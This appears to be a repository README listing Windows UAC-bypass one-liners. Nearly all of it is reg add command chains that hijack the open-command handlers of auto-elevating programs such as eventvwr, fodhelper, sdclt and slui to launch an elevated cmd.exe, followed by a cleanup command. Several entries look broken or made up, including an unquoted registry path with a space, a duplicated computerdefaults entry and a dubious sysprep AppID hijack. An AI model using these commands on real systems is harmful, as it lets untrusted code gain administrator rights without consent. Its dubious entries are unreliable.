/uac-bypass-oneliners

Collection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.

uac-bypass-oneliners

Collection of one-liners to bypass User Account Control (UAC) in Windows. These techniques exploit certain behavior in Windows applications to elevate privileges.

Techniques
Using eventvwr.exe:


reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && eventvwr.exe

Using fodhelper.exe:


reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "cmd.exe" && start fodhelper.exe

Using computerdefaults.exe:


reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && start computerdefaults.exe

Using sdclt.exe:


reg add HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /ve /t REG_SZ /d "cmd.exe" /f && start sdclt.exe

Using slui.exe:


reg add HKCU\Software\Classes\exefile\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\exefile\shell\open\command /v DelegateExecute /f && start slui.exe

Using perfmon.exe:


reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v DelegateExecute /t REG_SZ /d "" /f && reg add "HKCU\Software\Classes\mscfile\shell\open\command" /ve /t REG_SZ /d "cmd /c start cmd" /f && start perfmon.exe

Using taskmgr.exe:

reg add HKCU\Software\Classes\taskmgr\shell\open\command /ve /t REG_SZ /d "cmd.exe" /f && start taskmgr.exe

Using ComputerDefaults.exe:

reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /t REG_SZ /d "cmd.exe" /f && reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /d "" /f && start computerdefaults.exe

Using sysprep.exe:


reg add HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f /ve /t REG_SZ /d "cmd.exe" && start C:\Windows\System32\sysprep\sysprep.exe

Using control.exe with /computername:


cmd /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f && control.exe /computername

Reset:

reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f && reg delete HKCU\Software\Classes\ms-settings\shell\open\command /f && reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe /f && reg delete HKCU\Software\Classes\exefile\shell\open\command /f && reg delete HKCU\Software\Classes\taskmgr\shell\open\command /f && reg delete HKCU\Software\Classes\AppID\{921C1A8B-9F15-4DA4-9235-0472C3A216E6} /f